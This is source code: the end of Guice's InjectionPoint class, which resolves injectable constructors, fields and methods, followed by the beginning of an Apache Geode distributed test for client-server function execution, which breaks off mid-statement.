            || Nullability.hasNullableAnnotation(typeUseAnnotations)
            || KotlinSupport.getInstance().isNullable(field);
    // Parameter index -1 marks a field dependency (a field has no parameter position).
    this.dependencies = ImmutableList.<Dependency<?>>of(newDependency(key, allowsNull, -1));
  }

  /**
   * Builds one {@link Dependency} per parameter of the given method or constructor.
   *
   * <p>Problems resolving a parameter's key are accumulated in {@code errors}; a
   * {@link ConfigurationException} is thrown afterwards if any were recorded, so all bad
   * parameters are reported together rather than failing on the first.
   *
   * @param errors collector for configuration problems
   * @param member the method or constructor whose parameters are inspected
   * @param type the declaring type, used to resolve the parameter types
   * @param annotatedTypes annotated parameter types, consulted for type-use nullability annotations
   * @param parameterAnnotationsPerParameter declared annotations for each parameter
   * @param isParameterKotlinNullable reports whether the i-th parameter is nullable in Kotlin
   */
  private ImmutableList<Dependency<?>> forMember(
      Errors errors,
      Member member,
      TypeLiteral<?> type,
      AnnotatedType[] annotatedTypes,
      Annotation[][] parameterAnnotationsPerParameter,
      Predicate<Integer> isParameterKotlinNullable) {
    List<Dependency<?>> dependencies = Lists.newArrayList();
    int index = 0;
    for (TypeLiteral<?> parameterType : type.getParameterTypes(member)) {
      try {
        Annotation[] typeAnnotations = annotatedTypes[index].getAnnotations();
        Annotation[] parameterAnnotations = parameterAnnotationsPerParameter[index];
        Key<?> key = Annotations.getKey(parameterType, member, parameterAnnotations, errors);
        // Same three nullability sources as for fields: parameter annotations,
        // type-use annotations, and Kotlin metadata.
        boolean isNullable =
            Nullability.hasNullableAnnotation(parameterAnnotations)
                || Nullability.hasNullableAnnotation(typeAnnotations)
                || isParameterKotlinNullable.test(index);
        dependencies.add(newDependency(key, isNullable, index));
        index++;
      } catch (ConfigurationException e) {
        errors.merge(e.getErrorMessages());
      } catch (ErrorsException e) {
        errors.merge(e.getErrors());
      }
    }
    errors.throwConfigurationExceptionIfErrorsExist();
    return ImmutableList.copyOf(dependencies);
  }

  // This method is necessary to create a Dependency<T> with proper generic type information
  private <T> Dependency<T> newDependency(Key<T> key, boolean allowsNull, int parameterIndex) {
    return new Dependency<T>(this, key, allowsNull, parameterIndex);
  }

  /** Returns the injected constructor, field, or method. */
  public Member getMember() {
    // TODO: Don't expose the original member (which probably has setAccessible(true)).
    return member;
  }

  /**
   * Returns the dependencies for this injection point.
If the injection point is for a method or * constructor, the dependencies will correspond to that member's parameters. Field injection * points always have a single dependency for the field itself. * * @return a possibly-empty list */ public List<Dependency<?>> getDependencies() { return dependencies; } /** * Returns true if this injection point shall be skipped if the injector cannot resolve bindings * for all required dependencies. Both explicit bindings (as specified in a module), and implicit * bindings ({@literal @}{@link com.google.inject.ImplementedBy ImplementedBy}, default * constructors etc.) may be used to satisfy optional injection points. */ public boolean isOptional() { return optional; } /** * Returns true if the element is annotated with {@literal @}{@link Toolable}. * * @since 3.0 */ public boolean isToolable() { return ((AnnotatedElement) member).isAnnotationPresent(Toolable.class); } /** * Returns the generic type that defines this injection point. If the member exists on a * parameterized type, the result will include more type information than the member's {@link * Member#getDeclaringClass() raw declaring class}. * * @since 3.0 */ public TypeLiteral<?> getDeclaringType() { return declaringType; } @Override public boolean equals(Object o) { return o instanceof InjectionPoint && member.equals(((InjectionPoint) o).member) && declaringType.equals(((InjectionPoint) o).declaringType); } @Override public int hashCode() { return member.hashCode() ^ declaringType.hashCode(); } @Override public String toString() { return Classes.toString(member); } /** * Returns a new injection point for the specified constructor. If the declaring type of {@code * constructor} is parameterized (such as {@code List<T>}), prefer the overload that includes a * type literal. * * @param constructor any single constructor present on {@code type}. 
* @since 3.0 */ public static <T> InjectionPoint forConstructor(Constructor<T> constructor) { return new InjectionPoint(TypeLiteral.get(constructor.getDeclaringClass()), constructor); } /** * Returns a new injection point for the specified constructor of {@code type}. * * @param constructor any single constructor present on {@code type}. * @param type the concrete type that defines {@code constructor}. * @since 3.0 */ public static <T> InjectionPoint forConstructor( Constructor<T> constructor, TypeLiteral<? extends T> type) { if (type.getRawType() != constructor.getDeclaringClass()) { new Errors(type) .constructorNotDefinedByType(constructor, type) .throwConfigurationExceptionIfErrorsExist(); } return new InjectionPoint(type, constructor); } /** * Returns a new injection point for the injectable constructor of {@code type}. * * <p>Either a {@code @Inject} annotated constructor or a non-private no arg constructor is * required to be defined by the class corresponding to {@code type}. * * @param type a concrete type with exactly one constructor annotated {@literal @}{@link Inject}, * or a no-arguments constructor that is not private. * @throws ConfigurationException if there is no injectable constructor, more than one injectable * constructor, or if parameters of the injectable constructor are malformed, such as a * parameter with multiple binding annotations. */ public static InjectionPoint forConstructorOf(TypeLiteral<?> type) { return forConstructorOf(type, false); } /** * Returns a new injection point for the injectable constructor of {@code type}. * * <p>If {@code atInjectRequired} is true, the constructor must be annotated with {@code @Inject}. * If {@code atInjectRequired} is false, either a {@code @Inject} annotated constructor or a * non-private no arg constructor is required to be defined by the class corresponding to {@code * type}. 
* * @param type a concrete type with exactly one constructor annotated {@code @Inject}, or a * no-arguments constructor that is not private. * @param atInjectRequired whether the constructor must be annotated with {@code Inject}. * @throws ConfigurationException if there is no injectable constructor, more than one injectable * constructor, or if parameters of the injectable constructor are malformed, such as a * parameter with multiple binding annotations. * @since 5.0 */ public static InjectionPoint forConstructorOf(TypeLiteral<?> type, boolean atInjectRequired) { Class<?> rawType = getRawType(type.getType()); Errors errors = new Errors(rawType); List<Constructor<?>> atInjectConstructors = Arrays.stream(rawType.getDeclaredConstructors()) .filter(InjectionPoint::isInjectableConstructor) .collect(Collectors.toList()); Constructor<?> injectableConstructor = null; atInjectConstructors.stream() .filter(constructor -> constructor.isAnnotationPresent(Inject.class)) .filter(constructor -> constructor.getAnnotation(Inject.class).optional()) .forEach(errors::optionalConstructor); if (atInjectConstructors.size() > 1) { errors.tooManyConstructors(rawType); } else { injectableConstructor = Iterables.getOnlyElement(atInjectConstructors, null); if (injectableConstructor != null) { checkForMisplacedBindingAnnotations(injectableConstructor, errors); } } if (atInjectRequired && injectableConstructor == null) { errors.atInjectRequired(type); } errors.throwConfigurationExceptionIfErrorsExist(); if (injectableConstructor != null) { return new InjectionPoint(type, injectableConstructor); } // If no annotated constructor is found, look for a no-arg constructor instead. 
try {
      Constructor<?> noArgConstructor = rawType.getDeclaredConstructor();

      // Disallow private constructors on non-private classes (unless they have @Inject)
      if (Modifier.isPrivate(noArgConstructor.getModifiers())
          && !Modifier.isPrivate(rawType.getModifiers())) {
        errors.missingConstructor(type);
        throw new ConfigurationException(errors.getMessages());
      }

      checkForMisplacedBindingAnnotations(noArgConstructor, errors);
      return new InjectionPoint(type, noArgConstructor);
    } catch (NoSuchMethodException e) {
      // No no-arg constructor either: the type has no injectable constructor at all.
      errors.missingConstructor(type);
      throw new ConfigurationException(errors.getMessages());
    }
  }

  /** Returns true if the constructor carries either the Guice or the jakarta.inject annotation. */
  private static boolean isInjectableConstructor(Constructor<?> constructor) {
    return constructor.isAnnotationPresent(Inject.class)
        || constructor.isAnnotationPresent(jakarta.inject.Inject.class);
  }

  /**
   * Returns a new injection point for the injectable constructor of {@code type}.
   *
   * @param type a concrete type with exactly one constructor annotated {@literal @}{@link Inject},
   *     or a no-arguments constructor that is not private.
   * @throws ConfigurationException if there is no injectable constructor, more than one injectable
   *     constructor, or if parameters of the injectable constructor are malformed, such as a
   *     parameter with multiple binding annotations.
   */
  public static InjectionPoint forConstructorOf(Class<?> type) {
    return forConstructorOf(TypeLiteral.get(type));
  }

  /**
   * Returns a new injection point for the specified method of {@code type}. This is useful for
   * extensions that need to build dependency graphs from arbitrary methods.
   *
   * @param method any single method present on {@code type}.
   * @param type the concrete type that defines {@code method}.
   * @since 4.0
   */
  public static <T> InjectionPoint forMethod(Method method, TypeLiteral<T> type) {
    return new InjectionPoint(type, method, false);
  }

  /**
   * Returns all static method and field injection points on {@code type}.
   *
   * @return a possibly empty set of injection points. The set has a specified iteration order.
All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forStaticMethodsAndFields(TypeLiteral<?> type) { Errors errors = new Errors(); Set<InjectionPoint> result; if (type.getRawType().isInterface()) { errors.staticInjectionOnInterface(type.getRawType()); result = null; } else { result = getInjectionPoints(type, true, errors); } if (errors.hasErrors()) { throw new ConfigurationException(errors.getMessages()).withPartialValue(result); } return result; } /** * Returns all static method and field injection points on {@code type}. * * @return a possibly empty set of injection points. The set has a specified iteration order. All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forStaticMethodsAndFields(Class<?> type) { return forStaticMethodsAndFields(TypeLiteral.get(type)); } /** * Returns all instance method and field injection points on {@code type}. * * @return a possibly empty set of injection points. The set has a specified iteration order. All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. 
Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forInstanceMethodsAndFields(TypeLiteral<?> type) { Errors errors = new Errors(); Set<InjectionPoint> result = getInjectionPoints(type, false, errors); if (errors.hasErrors()) { throw new ConfigurationException(errors.getMessages()).withPartialValue(result); } return result; } /** * Returns all instance method and field injection points on {@code type}. * * @return a possibly empty set of injection points. The set has a specified iteration order. All * fields are returned and then all methods. Within the fields, supertype fields are returned * before subtype fields. Similarly, supertype methods are returned before subtype methods. * @throws ConfigurationException if there is a malformed injection point on {@code type}, such as * a field with multiple binding annotations. The exception's {@link * ConfigurationException#getPartialValue() partial value} is a {@code Set<InjectionPoint>} of * the valid injection points. */ public static Set<InjectionPoint> forInstanceMethodsAndFields(Class<?> type) { return forInstanceMethodsAndFields(TypeLiteral.get(type)); } /** Returns true if the binding annotation is in the wrong place. */ private static boolean checkForMisplacedBindingAnnotations(Member member, Errors errors) { Annotation misplacedBindingAnnotation = Annotations.findBindingAnnotation( errors, member, ((AnnotatedElement) member).getAnnotations()); if (misplacedBindingAnnotation == null) { return false; } // don't warn about misplaced binding annotations on methods when there's a field with the same // name. In Scala, fields always get accessor methods (that we need to ignore). 
See bug 242. if (member instanceof Method) { try { if (member.getDeclaringClass().getDeclaredField(member.getName()) != null) { return false; } } catch (NoSuchFieldException ignore) { } } errors.misplacedBindingAnnotation(member, misplacedBindingAnnotation); return true; } /** Node in the doubly-linked list of injectable members (fields and methods). */ abstract static class InjectableMember { final TypeLiteral<?> declaringType; final boolean optional; final boolean specInject; InjectableMember previous; InjectableMember next; InjectableMember(TypeLiteral<?> declaringType, Annotation atInject) { this.declaringType = declaringType; if ( atInject.annotationType() == jakarta.inject.Inject.class) { optional = false; specInject = true; return; } specInject = false; optional = ((Inject) atInject).optional(); } abstract InjectionPoint toInjectionPoint(); } static class InjectableField extends InjectableMember { final Field field; InjectableField(TypeLiteral<?> declaringType, Field field, Annotation atInject) { super(declaringType, atInject); this.field = field; } @Override InjectionPoint toInjectionPoint() { return new InjectionPoint(declaringType, field, optional); } } static class InjectableMethod extends InjectableMember { final Method method; /** * true if this method overrode a method that was annotated with com.google.inject.Inject. used * to allow different override behavior for guice inject vs jsr330 Inject */ boolean overrodeGuiceInject; InjectableMethod(TypeLiteral<?> declaringType, Method method, Annotation atInject) { super(declaringType, atInject); this.method = method; } @Override InjectionPoint toInjectionPoint() { return new InjectionPoint(declaringType, method, optional); } public boolean isFinal() { return Modifier.isFinal(method.getModifiers()); } } static Annotation getAtInject(AnnotatedElement member) { Annotation a = member.getAnnotation(jakarta.inject.Inject.class); return a == null ? 
member.getAnnotation(Inject.class) : a; } /** Linked list of injectable members. */ static class InjectableMembers { InjectableMember head; InjectableMember tail; void add(InjectableMember member) { if (head == null) { head = tail = member; } else { member.previous = tail; tail.next = member; tail = member; } } void remove(InjectableMember member) { if (member.previous != null) { member.previous.next = member.next; } if (member.next != null) { member.next.previous = member.previous; } if (head == member) { head = member.next; } if (tail == member) { tail = member.previous; } } boolean isEmpty() { return head == null; } } /** Position in type hierarchy. */ enum Position { TOP, // No need to check for overridden methods MIDDLE, BOTTOM // Methods won't be overridden } /** * Keeps track of injectable methods so we can remove methods that get overridden in O(1) time. * Uses our position in the type hierarchy to perform optimizations. */ static class OverrideIndex { final InjectableMembers injectableMembers; Map<Signature, List<InjectableMethod>> bySignature; Position position = Position.TOP; OverrideIndex(InjectableMembers injectableMembers) { this.injectableMembers = injectableMembers; } /* Caches the signature for the last method. */ Method lastMethod; Signature lastSignature; /** * Removes a method overridden by the given method, if present. In order to remain backwards * compatible with prior Guice versions, this will *not* remove overridden methods if * 'alwaysRemove' is false and the overridden signature was annotated with a * com.google.inject.Inject. * * @param method The method used to determine what is overridden and should be removed. 
* @param alwaysRemove true if overridden methods should be removed even if they were * guice @Inject * @param injectableMethod if this method overrode any guice @Inject methods, {@link * InjectableMethod#overrodeGuiceInject} is set to true */ boolean removeIfOverriddenBy( Method method, boolean alwaysRemove, InjectableMethod injectableMethod) { if (position == Position.TOP) { // If we're at the top of the hierarchy, there's nothing to override. return false; } if (bySignature == null) { // We encountered a method in a subclass. Time to index the // methods in the parent class. bySignature = new HashMap<>(); for (InjectableMember member = injectableMembers.head; member != null; member = member.next) { if (!(member instanceof InjectableMethod)) { continue; } InjectableMethod im = (InjectableMethod) member; if (im.isFinal()) { continue; } List<InjectableMethod> methods = new ArrayList<>(); methods.add(im); bySignature.put(new Signature(im.method), methods); } } lastMethod = method; Signature signature = lastSignature = new Signature(method); List<InjectableMethod> methods = bySignature.get(signature); boolean removed = false; if (methods != null) { for (Iterator<InjectableMethod> iterator = methods.iterator(); iterator.hasNext(); ) { InjectableMethod possiblyOverridden = iterator.next(); if (overrides(method, possiblyOverridden.method)) { boolean wasGuiceInject = !possiblyOverridden.specInject || possiblyOverridden.overrodeGuiceInject; if (injectableMethod != null) { injectableMethod.overrodeGuiceInject = wasGuiceInject; } // Only actually remove the methods if we want to force // remove or if the signature never specified @com.google.inject.Inject // somewhere. if (alwaysRemove || !wasGuiceInject) { removed = true; iterator.remove(); injectableMembers.remove(possiblyOverridden); } } } } return removed; } /** * Adds the given method to the list of injection points. Keeps track of it in this index in * case it gets overridden. 
*/ void add(InjectableMethod injectableMethod) { injectableMembers.add(injectableMethod); if (position == Position.BOTTOM || injectableMethod.isFinal()) { // This method can't be overridden, so there's no need to index it. return; } if (bySignature != null) { // Try to reuse the signature we created during removal @SuppressWarnings("ReferenceEquality") Signature signature = injectableMethod.method == lastMethod ? lastSignature : new Signature(injectableMethod.method); bySignature.computeIfAbsent(signature, k -> new ArrayList<>()).add(injectableMethod); } } } /** * Returns an ordered, immutable set of injection points for the given type. Members in * superclasses come before members in subclasses. Within a class, fields come before methods. * Overridden methods are filtered out. The order of fields/methods within a class is consistent * but undefined. * * @param statics true is this method should return static members, false for instance members * @param errors used to record errors */ private static Set<InjectionPoint> getInjectionPoints( final TypeLiteral<?> type, boolean statics, Errors errors) { InjectableMembers injectableMembers = new InjectableMembers(); OverrideIndex overrideIndex = null; List<TypeLiteral<?>> hierarchy = hierarchyFor(type); int topIndex = hierarchy.size() - 1; for (int i = topIndex; i >= 0; i--) { if (overrideIndex != null && i < topIndex) { // Knowing the position within the hierarchy helps us make optimizations. 
if (i == 0) { overrideIndex.position = Position.BOTTOM; } else { overrideIndex.position = Position.MIDDLE; } } TypeLiteral<?> current = hierarchy.get(i); for (Field field : getDeclaredFields(current)) { if (Modifier.isStatic(field.getModifiers()) == statics) { Annotation atInject = getAtInject(field); if (atInject != null) { InjectableField injectableField = new InjectableField(current, field, atInject); if (injectableField.specInject && Modifier.isFinal(field.getModifiers())) { errors.cannotInjectFinalField(field); } injectableMembers.add(injectableField); } } } for (Method method : getDeclaredMethods(current)) { if (isEligibleForInjection(method, statics)) { Annotation atInject = getAtInject(method); if (atInject != null) { InjectableMethod injectableMethod = new InjectableMethod(current, method, atInject); if (checkForMisplacedBindingAnnotations(method, errors) || !isValidMethod(injectableMethod, errors)) { if (overrideIndex != null) { boolean removed = overrideIndex.removeIfOverriddenBy(method, false, injectableMethod); if (removed) { logger.log( Level.WARNING, "Method: {0} is not a valid injectable method (" + "because it either has misplaced binding annotations " + "or specifies type parameters) but is overriding a method that is " + "valid. Because it is not valid, the method will not be injected. " + "To fix this, make the method a valid injectable method.", method); } } continue; } if (statics) { injectableMembers.add(injectableMethod); } else { if (overrideIndex == null) { /* * Creating the override index lazily means that the first type in the hierarchy * with injectable methods (not necessarily the top most type) will be treated as * the TOP position and will enjoy the same optimizations (no checks for overridden * methods, etc.). */ overrideIndex = new OverrideIndex(injectableMembers); } else { // Forcibly remove the overridden method, otherwise we'll inject // it twice. 
overrideIndex.removeIfOverriddenBy(method, true, injectableMethod); } overrideIndex.add(injectableMethod); } } else { if (overrideIndex != null) { boolean removed = overrideIndex.removeIfOverriddenBy(method, false, null); if (removed) { logger.log( Level.WARNING, "Method: {0} is not annotated with @Inject but " + "is overriding a method that is annotated with @jakarta.inject.Inject." + "Because it is not annotated with @Inject, the method will not be " + "injected. To fix this, annotate the method with @Inject.", method); } } } } } } if (injectableMembers.isEmpty()) { return Collections.emptySet(); } ImmutableSet.Builder<InjectionPoint> builder = ImmutableSet.builder(); for (InjectableMember im = injectableMembers.head; im != null; im = im.next) { try { builder.add(im.toInjectionPoint()); } catch (ConfigurationException ignorable) { if (!im.optional) { errors.merge(ignorable.getErrorMessages()); } } } return builder.build(); } private static Field[] getDeclaredFields(TypeLiteral<?> type) { return DeclaredMembers.getDeclaredFields(type.getRawType()); } private static Method[] getDeclaredMethods(TypeLiteral<?> type) { return DeclaredMembers.getDeclaredMethods(type.getRawType()); } /** * Returns true if the method is eligible to be injected. This is different than {@link * #isValidMethod}, because ineligibility will not drop a method from being injected if a * superclass was eligible and valid. Bridge and synthetic methods are excluded from eligibility * for two reasons: * * <p>Prior to Java8, javac would generate these methods in subclasses without annotations, which * means this would accidentally stop injecting a method annotated with {@link * jakarta.inject.Inject}, since the spec says to stop injecting if a subclass isn't annotated with * it. * * <p>Starting at Java8, javac copies the annotations to the generated subclass method, except it * leaves out the generic types. 
If this considered it a valid injectable method, this would eject
   * the parent's overridden method that had the proper generic types, and would use invalid
   * injectable parameters as a result.
   *
   * <p>The fix for both is simply to ignore these synthetic bridge methods.
   */
  private static boolean isEligibleForInjection(Method method, boolean statics) {
    return Modifier.isStatic(method.getModifiers()) == statics
        && !method.isBridge()
        && !method.isSynthetic();
  }

  /**
   * Returns false (recording an error) if a spec-annotated ({@code jakarta.inject.Inject}) method
   * is abstract or declares type parameters. Methods annotated only with Guice's own
   * {@code @Inject} skip these checks ({@code specInject} is false for them).
   */
  private static boolean isValidMethod(InjectableMethod injectableMethod, Errors errors) {
    boolean result = true;
    if (injectableMethod.specInject) {
      Method method = injectableMethod.method;
      if (Modifier.isAbstract(method.getModifiers())) {
        errors.cannotInjectAbstractMethod(method);
        result = false;
      }
      if (method.getTypeParameters().length > 0) {
        errors.cannotInjectMethodWithTypeParameters(method);
        result = false;
      }
    }
    return result;
  }

  /**
   * Returns the type hierarchy from {@code type} up to (but excluding) {@code Object}, ordered
   * from subtype to supertype; supertypes are resolved via {@code TypeLiteral.getSupertype} so
   * the generic context of {@code type} is preserved.
   */
  private static List<TypeLiteral<?>> hierarchyFor(TypeLiteral<?> type) {
    List<TypeLiteral<?>> hierarchy = new ArrayList<>();
    TypeLiteral<?> current = type;
    while (current.getRawType() != Object.class) {
      hierarchy.add(current);
      current = current.getSupertype(current.getRawType().getSuperclass());
    }
    return hierarchy;
  }

  /**
   * Returns true if a overrides b. Assumes signatures of a and b are the same and a's declaring
   * class is a subclass of b's declaring class.
   */
  private static boolean overrides(Method a, Method b) {
    // See JLS section 8.4.8.1
    int modifiers = b.getModifiers();
    if (Modifier.isPublic(modifiers) || Modifier.isProtected(modifiers)) {
      return true;
    }
    if (Modifier.isPrivate(modifiers)) {
      return false;
    }
    // b must be package-private, so a overrides it only from within the same package
    return a.getDeclaringClass().getPackage().equals(b.getDeclaringClass().getPackage());
  }

  /**
   * Returns all the annotations on a field. If Kotlin-support is enabled, the annotations will
   * include annotations on the related Kotlin-property.
*
   * @since 5.0
   */
  public static Annotation[] getAnnotations(Field field) {
    Annotation[] javaAnnotations = field.getAnnotations();
    Annotation[] kotlinAnnotations = KotlinSupport.getInstance().getAnnotations(field);
    if (kotlinAnnotations.length == 0) {
      // Common case: no Kotlin metadata for this field; skip the array concatenation.
      return javaAnnotations;
    }
    return ObjectArrays.concat(javaAnnotations, kotlinAnnotations, Annotation.class);
  }

  /** A method signature. Used to handle method overriding. */
  static class Signature {

    final String name;
    final Class<?>[] parameterTypes;
    // Hash is precomputed once in the constructor: signatures are used as HashMap keys in
    // OverrideIndex and may be compared many times while walking the type hierarchy.
    final int hash;

    Signature(Method method) {
      this.name = method.getName();
      this.parameterTypes = method.getParameterTypes();

      // 31-based rolling hash over the name, arity, and each parameter type.
      int h = name.hashCode();
      h = h * 31 + parameterTypes.length;
      for (Class<?> parameterType : parameterTypes) {
        h = h * 31 + parameterType.hashCode();
      }
      this.hash = h;
    }

    @Override
    public int hashCode() {
      return this.hash;
    }

    @Override
    public boolean equals(Object o) {
      if (!(o instanceof Signature)) {
        return false;
      }
      Signature other = (Signature) o;
      if (!name.equals(other.name)) {
        return false;
      }
      if (parameterTypes.length != other.parameterTypes.length) {
        return false;
      }
      // Reference comparison is sufficient here: a Class object is unique per class loader.
      for (int i = 0; i < parameterTypes.length; i++) {
        if (parameterTypes[i] != other.parameterTypes[i]) {
          return false;
        }
      }
      return true;
    }
  }
}
apache/geode
35,748
geode-core/src/distributedTest/java/org/apache/geode/internal/cache/execute/ClientServerFunctionExecutionDUnitTest.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.internal.cache.execute; import static org.assertj.core.api.Assertions.assertThatThrownBy; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import java.io.Serializable; import java.util.ArrayList; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Properties; import org.apache.logging.log4j.Logger; import org.junit.Test; import org.junit.experimental.categories.Category; import org.junit.runner.RunWith; import org.junit.runners.Parameterized; import org.junit.runners.Parameterized.UseParametersRunnerFactory; import org.apache.geode.cache.AttributesFactory; import org.apache.geode.cache.DataPolicy; import org.apache.geode.cache.Region; import org.apache.geode.cache.RegionAttributes; import org.apache.geode.cache.RegionShortcut; import org.apache.geode.cache.Scope; import org.apache.geode.cache.client.Pool; import org.apache.geode.cache.client.ServerConnectivityException; import org.apache.geode.cache.client.ServerOperationException; import 
org.apache.geode.cache.execute.Execution; import org.apache.geode.cache.execute.Function; import org.apache.geode.cache.execute.FunctionAdapter; import org.apache.geode.cache.execute.FunctionContext; import org.apache.geode.cache.execute.FunctionService; import org.apache.geode.cache.execute.ResultCollector; import org.apache.geode.cache.execute.ResultSender; import org.apache.geode.distributed.ConfigurationProperties; import org.apache.geode.distributed.DistributedSystem; import org.apache.geode.internal.cache.functions.TestFunction; import org.apache.geode.internal.cache.tier.sockets.CacheServerTestUtil; import org.apache.geode.logging.internal.log4j.api.LogService; import org.apache.geode.test.awaitility.GeodeAwaitility; import org.apache.geode.test.dunit.Assert; import org.apache.geode.test.dunit.IgnoredException; import org.apache.geode.test.dunit.SerializableRunnableIF; import org.apache.geode.test.dunit.WaitCriterion; import org.apache.geode.test.junit.categories.ClientServerTest; import org.apache.geode.test.junit.categories.FunctionServiceTest; import org.apache.geode.test.junit.runners.CategoryWithParameterizedRunnerFactory; @Category({ClientServerTest.class, FunctionServiceTest.class}) @RunWith(Parameterized.class) @UseParametersRunnerFactory(CategoryWithParameterizedRunnerFactory.class) public class ClientServerFunctionExecutionDUnitTest extends PRClientServerTestBase { private static final Logger logger = LogService.getLogger(); private static final String TEST_FUNCTION1 = TestFunction.TEST_FUNCTION1; private Boolean isByName = null; Function function = null; private Boolean toRegister = null; private static final String retryRegionName = "RetryDataRegion"; private static Region metaDataRegion; public ClientServerFunctionExecutionDUnitTest() { super(); } @Override protected final void postSetUpPRClientServerTestBase() { IgnoredException.addIgnoredException("java.net.ConnectException"); } @Override public Properties getDistributedSystemProperties() { 
Properties result = super.getDistributedSystemProperties(); result.put(ConfigurationProperties.SERIALIZABLE_OBJECT_FILTER, "org.apache.geode.internal.cache.execute.**;org.apache.geode.test.dunit.**"); return result; } @Test public void throwsExceptionWhenFunctionNotRegisteredOnServer() { createScenario(); try { client.invoke(ClientServerFunctionExecutionDUnitTest::executeRegisteredFunction); } catch (Exception e) { assertTrue((e.getCause() instanceof ServerOperationException)); assertTrue( e.getCause().getMessage().contains("The function is not registered for function id")); } } @Test public void noExceptionWhenFunctionRegisteredOnServer() { createScenario(); Function function = new TestFunction(true, TestFunction.TEST_FUNCTION1); registerFunctionAtServer(function); client.invoke(ClientServerFunctionExecutionDUnitTest::executeRegisteredFunction); } /* * Execution of the function on server using the name of the function */ @Test public void testServerExecution_byName() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TEST_FUNCTION1); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } @Test public void testServerExecution_sendException() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_SEND_EXCEPTION); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecution_SendException(isByName, 
function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .allServerExecution_SendException(isByName, function, toRegister)); } /* * Execution of the function on server using the name of the function */ @Test public void testServerExecution_NoLastResult() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TestFunction.TEST_FUNCTION_NO_LASTRESULT); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.TRUE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .serverExecution_NoLastResult(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest .allServerExecution_NoLastResult(isByName, function, toRegister)); } @Test public void testServerExecution_byName_WithoutRegister() { createScenario(); // function = new TestFunction1(); function = new TestFunction(true, TEST_FUNCTION1); registerFunctionAtServer(function); isByName = Boolean.TRUE; toRegister = Boolean.FALSE; logger.info( "ClientServerFFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.serverExecution(isByName, function, toRegister)); client.invoke(() -> ClientServerFunctionExecutionDUnitTest.allServerExecution(isByName, function, toRegister)); } /* * Execution of the inline function on server */ @Test public void testServerExecution_byInlineFunction() { createScenario(); logger.info( "ClientServerFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke(ClientServerFunctionExecutionDUnitTest::serverExecution_Inline); client.invoke(ClientServerFunctionExecutionDUnitTest::allServerExecution_Inline); } /* * Execution of the inline function on server */ @Test public void testServerExecution_byInlineFunction_InvalidAttrbiutes() { createScenario(); 
logger.info( "ClientServerFunctionExecutionDUnitTest#testServerSingleKeyExecution_byName : Starting test"); client.invoke( ClientServerFunctionExecutionDUnitTest::serverExecution_Inline_InvalidAttributes); } /* * Execution of the inline function on server */ @Test public void testBug40714() { createScenario(); logger .info("ClientServerFunctionExecutionDUnitTest#testBug40714 : Starting test"); server1.invoke( (SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); server1.invoke( (SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); server1.invoke( (SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); client .invoke((SerializableRunnableIF) ClientServerFunctionExecutionDUnitTest::registerFunction); client.invoke(ClientServerFunctionExecutionDUnitTest::FunctionExecution_Inline_Bug40714); } public static void registerFunction() { FunctionService.registerFunction(new FunctionAdapter() { @Override public void execute(FunctionContext context) { @SuppressWarnings("unchecked") final ResultSender<Object> resultSender = context.getResultSender(); if (context.getArguments() instanceof String) { resultSender.lastResult("Failure"); } else if (context.getArguments() instanceof Boolean) { resultSender.lastResult(Boolean.FALSE); } } @Override public String getId() { return "Function"; } @Override public boolean hasResult() { return true; } }); } private static void FunctionExecution_Inline_Bug40714() { DistributedSystem.setThreadsSocketPolicy(false); Execution member = 